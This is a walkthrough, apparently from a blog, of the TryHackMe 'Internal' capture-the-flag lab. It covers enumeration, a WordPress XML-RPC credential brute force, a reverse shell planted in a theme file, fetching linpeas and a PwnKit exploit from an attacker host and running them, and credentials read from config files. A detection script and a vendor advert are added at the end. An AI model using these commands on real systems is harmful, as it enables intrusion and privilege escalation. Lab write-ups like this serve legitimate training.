TryHackMe | Internal | Write Up

The realm of cybersecurity is as vast as it is intriguing, and every once in a while, a challenge comes along that truly tests our mettle as ethical hackers. Such was the case with the ‘Internal’ Capture The Flag (CTF) challenge on TryHackMe.

Imagine being handed an environment, just weeks away from going live, with the simple directive: «See if you can break in.» No hand-holding, no hints—just you, your skills, and a digital fortress waiting to be breached. This isn’t just a game; it’s a simulation of a real-world scenario where penetration testers are given minimal information and tasked with assessing potential vulnerabilities.

In this post, I’ll walk you through my journey tackling the ‘Internal’ challenge. With two elusive flags—User.txt and Root.txt—as the prime objectives, and a myriad of potential entry points and vulnerabilities to discover, this CTF isn’t for the faint of heart.

What tools did I opt for, especially considering the challenge can be completed without Metasploit? How did I strategize my approach to mimic an actual penetration test? Dive in, as we navigate through the digital labyrinth of ‘Internal’, gleaning insights and tactics that are invaluable for both aspiring and experienced penetration testers.

Enumeration

Let’s start with a basic NMAP scan:

nmap -n -Pn -sT -sV -T4 -v internal.thm

We will see two ports open:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have probably discovered a Linux server. To gather more information, we will scan all of the server’s ports with NMAP:

nmap -n -Pn -sT -sV -T4 -p- -v internal.thm

After checking all the server ports we get the same result:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we will check the web server with our web browser:


We have found the default Apache2 web page, and the source code shows nothing interesting. The next step is to try to find hidden directories with gobuster:

gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt

We have discovered some directories:

/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/blog (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)

We have probably found a WordPress installation:


We have also discovered that the user “admin” exists:


We have also found the phpMyAdmin login page:


Let’s try to detect WordPress vulnerabilities with “WPScan”:

wpscan --url http://internal.thm

Important information that we have discovered (XML-RPC, WordPress Readme, WP-Cron and WordPress version):

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

Initial exploitation

Let’s try to brute-force the WordPress “admin” user with WPXploit through XML-RPC:

$ git clone https://github.com/relarizky/wpxploit.git
$ cd wpxploit
$ pip3 install -r requirements.txt
$ python3 exploit.py http://internal.thm/blog/ 5 15

Finally, we have found credentials for the user “admin”:

admin:my2boys

So, let’s try to log in to the admin panel with these credentials, and we will see that we have access:


Now let’s try to get a reverse shell. We will edit the theme’s default 404 page so that it executes our reverse shell:


Now we need to turn on our listener:

nc -lvnp 4433

Now we need to request the default 404 page directly:

http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php

So we will receive our reverse shell:

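From the defender’s side, the two web steps above (the XML-RPC credential brute force and the direct request to an edited theme 404.php) leave a clear footprint in the Apache access log. The following script is an added example that is not part of the original write-up; it flags both patterns over constructed sample log lines and assumes the default combined log format, a threshold of ten POSTs per minute, and made-up client addresses.

```python
import re
from collections import Counter

# Apache "combined" log format, the Ubuntu default for access.log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A PHP template inside a theme directory requested directly (e.g. the edited 404.php).
THEME_PHP_RE = re.compile(r'^/(?:[^?]*/)?wp-content/themes/[^/]+/[^?]+\.php(?:\?.*)?$')

def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def xmlrpc_bursts(lines, threshold=10):
    """{(ip, minute): count} for clients POSTing to xmlrpc.php at least `threshold`
    times in one minute: the footprint of XML-RPC credential brute forcing."""
    hits = Counter()
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].split("?")[0].endswith("/xmlrpc.php"):
            hits[(rec["ip"], rec["ts"][:17])] += 1   # ts[:17] -> '03/Aug/2020:10:00'
    return {key: n for key, n in hits.items() if n >= threshold}

def direct_theme_php_hits(lines):
    """(ip, path, status) for every request that loads a theme PHP file directly.
    WordPress routes through index.php, so a 200 from themes/*/404.php is suspicious."""
    return [(rec["ip"], rec["path"], int(rec["status"]))
            for rec in filter(None, map(parse_line, lines))
            if THEME_PHP_RE.match(rec["path"])]

# Constructed sample log (not from the original post): twelve XML-RPC POSTs from one
# client within a minute, a direct hit on the theme's 404.php, then normal traffic.
SAMPLE_LOG = [
    f'10.10.69.20 - - [03/Aug/2020:10:00:{i:02d} +0000] "POST /blog/xmlrpc.php HTTP/1.1" '
    '200 423 "-" "python-requests/2.24"'
    for i in range(12)
] + [
    '10.10.69.20 - - [03/Aug/2020:10:05:44 +0000] "GET /blog/wp-content/themes/twentyseventeen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Aug/2020:10:06:00 +0000] "GET /blog/ HTTP/1.1" 200 12345 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Aug/2020:10:06:01 +0000] "GET /blog/wp-content/themes/twentyseventeen/style.css HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(xmlrpc_bursts(SAMPLE_LOG))
    print(direct_theme_php_hits(SAMPLE_LOG))
```

Disabling XML-RPC when it is not needed and keeping theme files non-writable by the web server user removes both footholds, which is what the write-up’s own findings point at.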

Privilege escalation 1

But we don’t have access to the user flag yet, so we need to enumerate further with this shell. Let’s check the home directory:

ls -la /home

We have discovered an interesting directory:


Let’s check the “/etc/passwd”:


We can confirm that the user “aubreanna” exists. The next step is to check the credentials in “wp-config.php”, because we may find more information in the phpMyAdmin panel:

cat wp-config.php

We don’t find any more information in phpMyAdmin. Let’s run LinPEAS to try to detect something, but first we start our web server so that we can run linpeas on the victim:

python3 -m http.server 8080

Then from our reverse shell we will execute linpeas.sh in memory:

curl 10.10.69.20:8080/linpeas.sh | sh

If you remember, we know the phpMyAdmin application is installed. So let’s check it:

Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root www-data 68 Aug  3  2020 /var/lib/phpmyadmin/blowfish_secret.inc.php
-rw-r----- 1 root www-data 0 Aug  3  2020 /var/lib/phpmyadmin/config.inc.php
-rw-r----- 1 root www-data 527 Aug  3  2020 /etc/phpmyadmin/config-db.php
-rw-r----- 1 root www-data 8 Aug  3  2020 /etc/phpmyadmin/htpasswd.setup

We will check those files, but unfortunately we don’t find anything we can use:

$ cat /var/lib/phpmyadmin/blowfish_secret.inc.php
<?php
$cfg['blowfish_secret'] = '6wqoJ$mf_Wv($r?g$l4+#P#lAoCVVUM3';
$ cat /etc/phpmyadmin/config-db.php
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded.  *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='B2Ud4fEOZmVq';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';

But after more enumeration we have found an interesting file:

cat /opt/wp-save.txt

It contains the “aubreanna” credentials:

Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123

Let’s check if we can access through SSH:

ssh aubreanna@internal.thm

Now we have access to the user flag.

Privilege Escalation 2

At this point we need to keep enumerating. So we will check the home directory:

aubreanna@internal:~$ ls -la
total 56
drwx------ 7 aubreanna aubreanna 4096 Aug  3  2020 .
drwxr-xr-x 3 root      root      4096 Aug  3  2020 ..
-rwx------ 1 aubreanna aubreanna    7 Aug  3  2020 .bash_history
-rwx------ 1 aubreanna aubreanna  220 Apr  4  2018 .bash_logout
-rwx------ 1 aubreanna aubreanna 3771 Apr  4  2018 .bashrc
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .cache
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .gnupg
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .local
-rwx------ 1 root      root       223 Aug  3  2020 .mysql_history
-rwx------ 1 aubreanna aubreanna  807 Apr  4  2018 .profile
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .ssh
-rwx------ 1 aubreanna aubreanna    0 Aug  3  2020 .sudo_as_admin_successful
-rwx------ 1 aubreanna aubreanna   55 Aug  3  2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3  2020 user.txt

If we check the file “jenkins.txt” we can see this:

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

Also, if we check the directory “snap” we can see a docker directory:

aubreanna@internal:~$ ls -la snap
total 12
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .
drwx------ 7 aubreanna aubreanna 4096 Aug  3  2020 ..
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 docker
aubreanna@internal:~$ ls -la snap/docker/
total 8
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 ..
lrwxrwxrwx 1 aubreanna aubreanna    3 Aug  3  2020 current -> 471

We have some information, but we will run LinPEAS to get more. We will run LinPEAS in memory, so first of all we need to start our web server with Python:

python3 -m http.server 8080

Then we can execute LinPEAS in memory:

curl 10.10.14.171:8080/linpeas.sh | sh

We can check whether the “PwnKit” vulnerability is exploitable:


At this point we will upload the exploit:

aubreanna@internal:~$ curl 10.10.14.171:8080/PwnKit >> PwnKit.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 18040  100 18040    0     0  1355k      0 --:--:-- --:--:-- --:--:-- 1355k

Let’s execute this exploit:

aubreanna@internal:~$ ls 
PwnKit.sh  jenkins.txt  snap  user.txt
aubreanna@internal:~$ chmod +x PwnKit.sh 
aubreanna@internal:~$ ./PwnKit.sh 
root@internal:/home/aubreanna#

Then we have access to the root flag.


🔒 Hardsoft Security offers cybersecurity consulting services, ensuring that your business is always protected against the latest threats. And if you’re looking for hosting that prioritizes security, Secure Hosting is your ideal solution. We help keep your website safe with the best cybersecurity practices through our specialized cybersecurity advice.

Don’t wait to be the next target. Secure your online presence with the best solutions and services on the market. Contact Hardsoft Security and Secure Hosting today!

(Cybersecurity is not a luxury but a necessity. Protect your investment and your online reputation.).
